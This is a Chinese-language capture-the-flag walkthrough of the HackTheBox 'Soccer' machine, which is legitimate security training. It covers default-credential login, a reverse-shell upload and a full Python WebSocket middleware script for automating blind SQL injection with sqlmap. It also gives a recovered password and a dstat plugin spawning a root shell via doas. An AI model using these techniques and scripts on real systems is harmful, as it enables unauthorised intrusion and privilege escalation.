Soccer
一、常规nmap扫描
发现该靶机开放了22和80端口,并且使用Nginx
二、80端口渗透
-
访问80端口,显示一个静态页面,并无其他信息
-
进行目录扫描
发现tiny目录,访问发现是个登录入口,经Google大法发现这个入口默认密码为admin:admin@123
-
登录后,发现其具有上传文件功能点,于是上传一个反弹shell马并成功返回shell
-
返回的是一个非交互式shell,利用dpkg -l | grep python查看其具有python,并利用python生成一个交互式shell
-
通过/etc/passwd查询得知该机器有一个名为player的用户
-
由于之前扫描端口时发现这个网站使用Nginx,于是访问Nginx的配置文件,并通过访问默认站点配置文件,发现其还有另一个子域名为soc-player.soccer.htb
www-data@soccer:/etc/nginx$ cat nginx.conf
cat nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
# multi_accept on;
}
http {
##
# Basic Settings
##
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
# server_tokens off;
# server_names_hash_bucket_size 64;
# server_name_in_redirect off;
include /etc/nginx/mime.types;
default_type application/octet-stream;
##
# SSL Settings
##
ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE
ssl_prefer_server_ciphers on;
##
# Logging Settings
##
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
##
# Gzip Settings
##
gzip on;
# gzip_vary on;
# gzip_proxied any;
# gzip_comp_level 6;
# gzip_buffers 16 8k;
# gzip_http_version 1.1;
# gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;
##
# Virtual Host Configs
##
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
#mail {
# # See sample authentication script at:
# # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
#
# # auth_http localhost/auth.php;
# # pop3_capabilities "TOP" "USER";
# # imap_capabilities "IMAP4rev1" "UIDPLUS";
#
# server {
# listen localhost:110;
# protocol pop3;
# proxy on;
# }
#
# server {
# listen localhost:143;
# protocol imap;
# proxy on;
# }
#}
www-data@soccer:/etc/nginx/sites-enabled$ cat soc-player.htb
cat soc-player.htb
server {
listen 80;
listen [::]:80;
server_name soc-player.soccer.htb;
root /root/app/views;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}
- 访问子域名soc-player.soccer.htb,发现其是具有注册登录功能的页面,于是自行注册账号并登录
-
登录进来发现只有一个验证ticket的界面,具有websocket接口
-
因其与数据库交互,尝试sql注入,通过验证发现可以进行布尔盲注
-
布尔盲注纯手工注入太耗时间但是sqlmap无法直接对websocket接口进行自动化注入,通过google搜索找到一篇参考文章
Automating Blind SQL injection over WebSocket | Rayhan0x01’s Blog
首先需要创建一个python脚本,代码如下:
from http.server import SimpleHTTPRequestHandler from socketserver import TCPServer from urllib.parse import unquote, urlparse from websocket import create_connection ws_server = "ws://soc-player.soccer.htb:9091/" def send_ws(payload): ws = create_connection(ws_server) # If the server returns a response on connect, use below line #resp = ws.recv() # If server returns something like a token on connect you can find and extract from here # For our case, format the payload in JSON message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure data = '{"id":"%s"}' % message ws.send(data) resp = ws.recv() ws.close() if resp: return resp else: return '' def middleware_server(host_port,content_type="text/plain"): class CustomHandler(SimpleHTTPRequestHandler): def do_GET(self) -> None: self.send_response(200) try: payload = urlparse(self.path).query.split('=',1)[1] except IndexError: payload = False if payload: content = send_ws(payload) else: content = 'No parameters specified!' self.send_header("Content-type", content_type) self.end_headers() self.wfile.write(content.encode()) return class _TCPServer(TCPServer): allow_reuse_address = True httpd = _TCPServer(host_port, CustomHandler) httpd.serve_forever() print("[+] Starting MiddleWare Server") print("[+] Send payloads in http://localhost:8081/?id=*") try: middleware_server(('0.0.0.0',8081)) except KeyboardInterrupt: pass
运行脚本并在另一个终端执行以下命令来进行sqlmap自动化注入
sqlmap -u http://localhost:8081?id=1 -p id --dbs
经过漫长的等待,获取到数据库用户名密码player:PlayerOftheMatch2022
-
利用得到的用户名密码进行ssh登录,获取到第一个flag
三、提权
-
常规进行sudo,suid等信息收集,经过一顿折腾发现doas这个组件能以写入插件的方式进行suid提权
-
首先在/usr/local/share/dstat/中写入一个一个dastat_开头的py文件,命名随意,内容为
import os os.system("bash -i")
运行脚本后成功提权至root
-
随后在root文件夹下得到第二个rootflag